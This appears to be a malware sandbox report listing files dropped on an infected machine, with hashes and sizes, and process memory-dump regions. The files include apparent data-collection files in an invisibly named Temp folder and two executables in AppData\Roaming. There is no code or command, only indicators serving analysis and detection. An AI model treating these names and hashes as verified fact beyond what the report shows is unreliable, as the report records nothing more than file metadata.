C:\Users\Admin\AppData\Local\Temp\‍   ‎ \Directories\Downloads.txt

Filesize
762B

MD5
0972bd2ccd693ccc41df930ee3c7ea2a

SHA1
4e0152264eef681ba9bb1666b5b95d73a324eb10

SHA256
3dde0f4e17ff50782b232117046dc9983d52919d91a156eb1002691d61d3e54e

SHA512
6ef96884c36fbbedf5c4d5f7a0cc5f79c921730a914b98b85b453db57b8f64c2f89b42248ebd575646d1e111010f8027eb63c2f63b6541a1a97328d48c52d58b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‎ \Directories\Music.txt

Filesize
509B

MD5
a913dacfdffe2f5e154750f6e1b9a42f

SHA1
900a71026467d9ed7a6738acc3ce9b2ce50f742a

SHA256
d90f17e2bb64c7badb4aafd954774e8e155645a22973ac4bbea933e2b000a8e1

SHA512
9a53b4d97dd2beaeef034e21b366c934d65a4e849a2290fbdb5950df7954bab403629530132bd7ad5f3f4fd2aee4f82c7cc731bf76eae89e01b5c37b21118c41

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‎ \Directories\Pictures.txt

Filesize
773B

MD5
adfe155fd6d8ae11f7e272e59c535a45

SHA1
27cebad2fe657a0d61f70cdff8c291cd7fb19137

SHA256
52f2de6d279b3f7ffe8a8acf04136b188ecba35c534d37116d8b7f892025183d

SHA512
44621b526d0d5dd8144efb35dabec0e214154964f0d829f9124423ebb9c79b174815f1fdaf25187c1dfdaabe2d105e7e9af5b0c51e4986d35ef8d9ecbfe5ee1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‎ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‎ \System\MAC Addresses.txt

Filesize
232B

MD5
901abf4d6507fee2ab859dc79d1cf436

SHA1
b96c1451f16ed38b453445fcb92cffdf815986d0

SHA256
b5c16229a0e207b6d3b68161bc4c65a7b2b3311860337fca50c5ad5b44ff5a62

SHA512
029526f3c5dccaf2cac27b9fbeb441e7422daedbe9f7ebd784905666506f76e8436a23be7092f3c71b3456de6aec382195d07ac54466bdf4bc35092e05763955

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‎ \System\System Info.txt

Filesize
2KB

MD5
92f2737c37817a0f4fb91b7e82e51e29

SHA1
dff45bb3ed3e2ba310197d74dec07943687551b6

SHA256
731a620d34cf25597600185534c3b3b9deec98f092138be8bb7932c0eea6f270

SHA512
a49577ed30d571dc7095f51598f414c378177a2340b8ae391ce8fd3967221a1735bbe84d1415d5deaf9db0f5da147193bde62f057825bf71e04a0e02eff2894d

Download Submit
C:\Users\Admin\AppData\Roaming\AQS-DataUpdater.exe

Filesize
6.6MB

MD5
f4faa578c971660f8431ce1f9353e19e

SHA1
0852a4262fa1e76f656f04fd13a3e6dc5654516f

SHA256
603372193629f7d8fc814fb673205855a39a06f639e6f49244045a164e010b28

SHA512
49470a541b1252acc8e683473829f78ad1bf87291783c411dbd57a7ba3ccdf1f5c2e03fd346693a213cd872140cb9466564e0d4ff3f8a16568b4e1407ae6f051

Download Submit
C:\Users\Admin\AppData\Roaming\AQS-data.exe

Filesize
3.1MB

MD5
4159eb8bbe8702aafb04c477409c402c

SHA1
b57f3ca9081540dea1c19f3430ccbd1767059fe7

SHA256
66883560ac9a6e981829b4137cdc3ab51aeb9c46d553ab5464b49c8c5d3c5008

SHA512
14133c920ee1f3780b3ce9dea67d2ee35ffe32f39b85364d9d3708d8ee7ab3219d4704631fb9235a4418314ef7f5bb4d033d8ce17bfa9d93c65066a357792553

Download Submit
memory/360-719-0x0000000000770000-0x0000000000A94000-memory.dmp

Filesize
3.1MB

Download
memory/360-760-0x000000001B700000-0x000000001B750000-memory.dmp

Filesize
320KB

Download
memory/360-761-0x000000001BF30000-0x000000001BFE2000-memory.dmp

Filesize
712KB

Download
memory/524-31-0x00007FFA5E613000-0x00007FFA5E615000-memory.dmp

Filesize
8KB

Download
memory/524-24-0x00000000007C0000-0x00000000007CE000-memory.dmp

Filesize
56KB

Download
memory/524-23-0x00007FFA5E613000-0x00007FFA5E615000-memory.dmp

Filesize
8KB

Download
memory/648-1135-0x0000000000130000-0x0000000000136000-memory.dmp

Filesize
24KB

Download
memory/664-1131-0x00007FFA672A0000-0x00007FFA672AF000-memory.dmp

Filesize
60KB

Download
memory/664-1130-0x00007FFA56790000-0x00007FFA567B4000-memory.dmp

Filesize
144KB

Download
memory/664-1188-0x00007FFA55F50000-0x00007FFA55F7E000-memory.dmp

Filesize
184KB

Download
memory/664-1192-0x00007FFA56F90000-0x00007FFA56F9D000-memory.dmp

Filesize
52KB

Download
memory/664-1180-0x00007FFA4F930000-0x00007FFA4FD95000-memory.dmp

Filesize
4.4MB

Download
memory/664-1191-0x00007FFA55F30000-0x00007FFA55F45000-memory.dmp

Filesize
84KB

Download
memory/664-1190-0x00007FFA50A80000-0x00007FFA50B37000-memory.dmp

Filesize
732KB

Download
memory/664-1189-0x00007FFA50700000-0x00007FFA50A77000-memory.dmp

Filesize
3.5MB

Download
memory/664-1187-0x00007FFA57090000-0x00007FFA5709D000-memory.dmp

Filesize
52KB

Download
memory/664-1186-0x00007FFA55F80000-0x00007FFA55F99000-memory.dmp

Filesize
100KB

Download
memory/664-1184-0x00007FFA579F0000-0x00007FFA57A08000-memory.dmp

Filesize
96KB

Download
memory/664-1183-0x00007FFA562D0000-0x00007FFA562FC000-memory.dmp

Filesize
176KB

Download
memory/664-1182-0x00007FFA672A0000-0x00007FFA672AF000-memory.dmp

Filesize
60KB

Download
memory/664-1181-0x00007FFA56790000-0x00007FFA567B4000-memory.dmp

Filesize
144KB

Download
memory/664-1172-0x00007FFA50B40000-0x00007FFA50CB1000-memory.dmp

Filesize
1.4MB

Download
memory/664-1165-0x00007FFA56F90000-0x00007FFA56F9D000-memory.dmp

Filesize
52KB

Download
memory/664-1164-0x00007FFA55F30000-0x00007FFA55F45000-memory.dmp

Filesize
84KB

Download
memory/664-1162-0x000001EDE1EC0000-0x000001EDE2237000-memory.dmp

Filesize
3.5MB

Download
memory/664-1161-0x00007FFA50700000-0x00007FFA50A77000-memory.dmp

Filesize
3.5MB

Download
memory/664-1157-0x00007FFA55F80000-0x00007FFA55F99000-memory.dmp

Filesize
100KB

Download
memory/664-1158-0x00007FFA57090000-0x00007FFA5709D000-memory.dmp

Filesize
52KB

Download
memory/664-1159-0x00007FFA55F50000-0x00007FFA55F7E000-memory.dmp

Filesize
184KB

Download
memory/664-1160-0x00007FFA50A80000-0x00007FFA50B37000-memory.dmp

Filesize
732KB

Download
memory/664-1150-0x00007FFA50B40000-0x00007FFA50CB1000-memory.dmp

Filesize
1.4MB

Download
memory/664-1147-0x00007FFA562D0000-0x00007FFA562FC000-memory.dmp

Filesize
176KB

Download
memory/664-1149-0x00007FFA56880000-0x00007FFA5689E000-memory.dmp

Filesize
120KB

Download
memory/664-1148-0x00007FFA579F0000-0x00007FFA57A08000-memory.dmp

Filesize
96KB

Download
memory/664-1185-0x00007FFA56880000-0x00007FFA5689E000-memory.dmp

Filesize
120KB

Download
memory/664-1128-0x00007FFA4F930000-0x00007FFA4FD95000-memory.dmp

Filesize
4.4MB

Download
memory/940-53-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/940-54-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/1412-1240-0x0000024375180000-0x0000024375188000-memory.dmp

Filesize
32KB

Download
memory/1724-928-0x0000000000190000-0x0000000000A0E000-memory.dmp

Filesize
8.5MB

Download
memory/1724-826-0x0000000005DA0000-0x0000000006344000-memory.dmp

Filesize
5.6MB

Download
memory/1724-819-0x0000000000190000-0x0000000000A0E000-memory.dmp

Filesize
8.5MB

Download
memory/1724-794-0x0000000000190000-0x0000000000A0E000-memory.dmp

Filesize
8.5MB

Download
memory/3100-29-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/3100-2-0x0000000004E30000-0x0000000004ECC000-memory.dmp

Filesize
624KB

Download
memory/3100-28-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

Filesize
4KB

Download
memory/3100-0-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

Filesize
4KB

Download
memory/3100-1-0x00000000004F0000-0x00000000004F8000-memory.dmp

Filesize
32KB

Download
memory/3100-3-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/3168-1217-0x0000000000E80000-0x0000000000EA0000-memory.dmp

Filesize
128KB

Download
memory/3168-1218-0x0000000002F20000-0x0000000002F26000-memory.dmp

Filesize
24KB

Download
memory/3604-505-0x0000000000660000-0x00000000006C1000-memory.dmp

Filesize
388KB

Download
memory/3604-25-0x00000000001A0000-0x00000000001F4000-memory.dmp

Filesize
336KB

Download
memory/3604-30-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/3604-26-0x0000000000660000-0x00000000006C1000-memory.dmp

Filesize
388KB

Download
memory/3604-27-0x00000000001A0000-0x00000000001A3000-memory.dmp

Filesize
12KB

Download
memory/3964-525-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/3964-528-0x000000006D240000-0x000000006D24A000-memory.dmp

Filesize
40KB

Download
memory/3964-527-0x000000006EB40000-0x000000006EB4A000-memory.dmp

Filesize
40KB

Download
memory/3964-526-0x000000006E5C0000-0x000000006E5CD000-memory.dmp

Filesize
52KB

Download
memory/4260-1344-0x00007FFA55870000-0x00007FFA55CD5000-memory.dmp

Filesize
4.4MB

Download
memory/4316-809-0x000001C995020000-0x000001C995042000-memory.dmp

Filesize
136KB

Download
memory/4440-945-0x00007FFA56240000-0x00007FFA56255000-memory.dmp

Filesize
84KB

Download
memory/4440-926-0x00007FFA4FCE0000-0x00007FFA4FD97000-memory.dmp

Filesize
732KB

Download
memory/4440-936-0x00007FFA56760000-0x00007FFA5678C000-memory.dmp

Filesize
176KB

Download
memory/4440-937-0x00007FFA57CE0000-0x00007FFA57CF8000-memory.dmp

Filesize
96KB

Download
memory/4440-941-0x00007FFA64B70000-0x00007FFA64B7D000-memory.dmp

Filesize
52KB

Download
memory/4440-942-0x00007FFA562D0000-0x00007FFA562FE000-memory.dmp

Filesize
184KB

Download
memory/4440-934-0x00007FFA579E0000-0x00007FFA57A04000-memory.dmp

Filesize
144KB

Download
memory/4440-946-0x00007FFA57FB0000-0x00007FFA57FBD000-memory.dmp

Filesize
52KB

Download
memory/4440-947-0x00007FFA50120000-0x00007FFA50291000-memory.dmp

Filesize
1.4MB

Download
memory/4440-948-0x00007FFA4FDA0000-0x00007FFA50117000-memory.dmp

Filesize
3.5MB

Download
memory/4440-938-0x00007FFA56740000-0x00007FFA5675E000-memory.dmp

Filesize
120KB

Download
memory/4440-930-0x00007FFA56240000-0x00007FFA56255000-memory.dmp

Filesize
84KB

Download
memory/4440-932-0x00007FFA57FB0000-0x00007FFA57FBD000-memory.dmp

Filesize
52KB

Download
memory/4440-923-0x00007FFA56720000-0x00007FFA56739000-memory.dmp

Filesize
100KB

Download
memory/4440-924-0x00007FFA64B70000-0x00007FFA64B7D000-memory.dmp

Filesize
52KB

Download
memory/4440-916-0x00007FFA56760000-0x00007FFA5678C000-memory.dmp

Filesize
176KB

Download
memory/4440-905-0x00007FFA579E0000-0x00007FFA57A04000-memory.dmp

Filesize
144KB

Download
memory/4440-906-0x00007FFA65220000-0x00007FFA6522F000-memory.dmp

Filesize
60KB

Download
memory/4440-917-0x00007FFA57CE0000-0x00007FFA57CF8000-memory.dmp

Filesize
96KB

Download
memory/4440-901-0x00007FFA505E0000-0x00007FFA50A45000-memory.dmp

Filesize
4.4MB

Download
memory/4440-918-0x00007FFA56740000-0x00007FFA5675E000-memory.dmp

Filesize
120KB

Download
memory/4440-921-0x00007FFA50120000-0x00007FFA50291000-memory.dmp

Filesize
1.4MB

Download
memory/4440-931-0x00007FFA505E0000-0x00007FFA50A45000-memory.dmp

Filesize
4.4MB

Download
memory/4440-944-0x00007FFA4FCE0000-0x00007FFA4FD97000-memory.dmp

Filesize
732KB

Download
memory/4440-940-0x00007FFA56720000-0x00007FFA56739000-memory.dmp

Filesize
100KB

Download
memory/4440-933-0x00007FFA505E0000-0x00007FFA50A45000-memory.dmp

Filesize
4.4MB

Download
memory/4440-925-0x00007FFA562D0000-0x00007FFA562FE000-memory.dmp

Filesize
184KB

Download
memory/4440-935-0x00007FFA65220000-0x00007FFA6522F000-memory.dmp

Filesize
60KB

Download
memory/4440-927-0x00007FFA4FDA0000-0x00007FFA50117000-memory.dmp

Filesize
3.5MB

Download
memory/4736-44-0x0000000000EA0000-0x0000000000EB2000-memory.dmp

Filesize
72KB

Download
memory/4736-64-0x00000000032F0000-0x0000000003356000-memory.dmp

Filesize
408KB

Download
memory/4824-902-0x0000000000400000-0x000000000066D000-memory.dmp

Filesize
2.4MB

Download
memory/4824-63-0x0000000000400000-0x000000000066D000-memory.dmp

Filesize
2.4MB

Download
memory/5248-756-0x0000000000A30000-0x0000000000AB2000-memory.dmp

Filesize
520KB

Download
memory/5248-747-0x0000000000A30000-0x0000000000AB2000-memory.dmp

Filesize
520KB

Download
memory/5248-746-0x0000000000A30000-0x0000000000AB2000-memory.dmp

Filesize
520KB

Download
memory/5248-745-0x0000000000A30000-0x0000000000AB2000-memory.dmp

Filesize
520KB

Download
memory/5928-735-0x00007FFA58A50000-0x00007FFA58EB5000-memory.dmp

Filesize
4.4MB

Download
memory/5928-827-0x00007FFA65230000-0x00007FFA6524E000-memory.dmp

Filesize
120KB

Download
memory/5928-772-0x00007FFA65230000-0x00007FFA6524E000-memory.dmp

Filesize
120KB

Download
memory/5928-770-0x00007FFA65270000-0x00007FFA6529C000-memory.dmp

Filesize
176KB

Download
memory/5928-754-0x00007FFA6BF80000-0x00007FFA6BFA4000-memory.dmp

Filesize
144KB

Download
memory/5928-755-0x00007FFA6EF70000-0x00007FFA6EF7F000-memory.dmp

Filesize
60KB

Download
memory/5928-771-0x00007FFA65250000-0x00007FFA65268000-memory.dmp

Filesize
96KB

Download
memory/5928-774-0x00007FFA5F8C0000-0x00007FFA5F8D9000-memory.dmp

Filesize
100KB

Download
memory/5928-776-0x00007FFA58550000-0x00007FFA5857E000-memory.dmp

Filesize
184KB

Download
memory/5928-775-0x00007FFA6E510000-0x00007FFA6E51D000-memory.dmp

Filesize
52KB

Download
memory/5928-781-0x00007FFA6BF80000-0x00007FFA6BFA4000-memory.dmp

Filesize
144KB

Download
memory/5928-780-0x00007FFA569A0000-0x00007FFA56D17000-memory.dmp

Filesize
3.5MB

Download
memory/5928-779-0x0000025D3F7C0000-0x0000025D3FB37000-memory.dmp

Filesize
3.5MB

Download
memory/5928-777-0x00007FFA58A50000-0x00007FFA58EB5000-memory.dmp

Filesize
4.4MB

Download
memory/5928-922-0x00007FFA569A0000-0x00007FFA56D17000-memory.dmp

Filesize
3.5MB

Download
memory/5928-773-0x00007FFA58580000-0x00007FFA586F1000-memory.dmp

Filesize
1.4MB

Download
memory/5928-778-0x00007FFA57210000-0x00007FFA572C7000-memory.dmp

Filesize
732KB

Download
memory/5928-783-0x00007FFA5F8A0000-0x00007FFA5F8B5000-memory.dmp

Filesize
84KB

Download
memory/5928-920-0x00007FFA57210000-0x00007FFA572C7000-memory.dmp

Filesize
732KB

Download
memory/5928-919-0x0000025D3F7C0000-0x0000025D3FB37000-memory.dmp

Filesize
3.5MB

Download
memory/5928-784-0x00007FFA570F0000-0x00007FFA57208000-memory.dmp

Filesize
1.1MB

Download
memory/5928-828-0x00007FFA58580000-0x00007FFA586F1000-memory.dmp

Filesize
1.4MB

Download
memory/5928-782-0x00007FFA6E060000-0x00007FFA6E06D000-memory.dmp

Filesize
52KB

Download
memory/5928-904-0x00007FFA5F8C0000-0x00007FFA5F8D9000-memory.dmp

Filesize
100KB

Download
memory/5928-915-0x00007FFA58550000-0x00007FFA5857E000-memory.dmp

Filesize
184KB

Download
memory/5928-1044-0x00007FFA6BF80000-0x00007FFA6BFA4000-memory.dmp

Filesize
144KB

Download
memory/5928-1053-0x00007FFA57210000-0x00007FFA572C7000-memory.dmp

Filesize
732KB

Download
memory/5928-1054-0x00007FFA569A0000-0x00007FFA56D17000-memory.dmp

Filesize
3.5MB

Download
memory/5928-1052-0x00007FFA58550000-0x00007FFA5857E000-memory.dmp

Filesize
184KB

Download
memory/5928-1043-0x00007FFA58A50000-0x00007FFA58EB5000-memory.dmp

Filesize
4.4MB

Download